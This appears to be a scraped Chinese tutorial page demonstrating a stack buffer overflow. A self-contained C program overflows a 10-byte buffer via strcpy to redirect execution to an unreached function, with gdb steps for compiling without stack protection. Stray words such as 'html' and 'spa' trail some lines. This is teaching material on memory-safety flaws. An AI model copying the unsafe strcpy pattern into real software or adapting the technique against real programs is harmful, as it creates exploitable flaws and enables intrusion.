緩衝區溢出攻擊
攻擊代碼:html
#include "stdio.h"
#include "string.h"
char code[]=
"\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41"
"\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41" // two more added
"\xbe\x05\x40\x00" // bug address
"\x00";
void copy(const char *input)
{
char buf[10];
strcpy(buf,input);
printf("%s \n",buf);
}
void bug(void)
{
printf("I shouldn’t have appeared\n");
}
int main(int argc,char *argv[])
{
copy(code);
return 0;
}
攻擊過程:app
1 關閉棧保護編譯打開gdb:spa
2 在strcpy和printf兩行都設置斷點,運行,查看rsp寄存器的值,找到strcpy所在的地址。.net
3 運行後查看,此時變爲了bug的地址。code
4 運行程序,達到攻擊目的htm
參考資料:blog
http://os.it168.com/a2009/0530/1059/000001059910.shtmlget
http://blog.csdn.net/liigo/article/details/582231input
http://blog.163.com/jw_chen_cs/blog/static/20221214820124119642246/string
相關文章
- 1. 緩衝區溢出攻擊
- 2. bufbomb-緩衝區溢出攻擊實驗
- 3. CSAPP 緩衝區溢出攻擊實驗
- 4. 緩衝區溢出攻擊實戰
- 5. 深刻淺出緩衝區溢出攻擊
- 6. 緩衝區溢出
- 7. 緩存區溢出攻擊實驗(1)
- 8. 緩存區溢出攻擊實驗(3)
- 9. 《CSAPP》實驗三:緩衝區溢出攻擊
- 10. 緩衝區溢出攻擊相關知識
- 更多相關文章...
- • SVN 解決衝突 - SVN 教程
- • PHP 5 時區 - PHP參考手冊
- • Git可視化極簡易教程 — Git GUI使用方法
- • Flink 數據傳輸及反壓詳解
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 緩衝區溢出攻擊
- 2. bufbomb-緩衝區溢出攻擊實驗
- 3. CSAPP 緩衝區溢出攻擊實驗
- 4. 緩衝區溢出攻擊實戰
- 5. 深刻淺出緩衝區溢出攻擊
- 6. 緩衝區溢出
- 7. 緩存區溢出攻擊實驗(1)
- 8. 緩存區溢出攻擊實驗(3)
- 9. 《CSAPP》實驗三:緩衝區溢出攻擊
- 10. 緩衝區溢出攻擊相關知識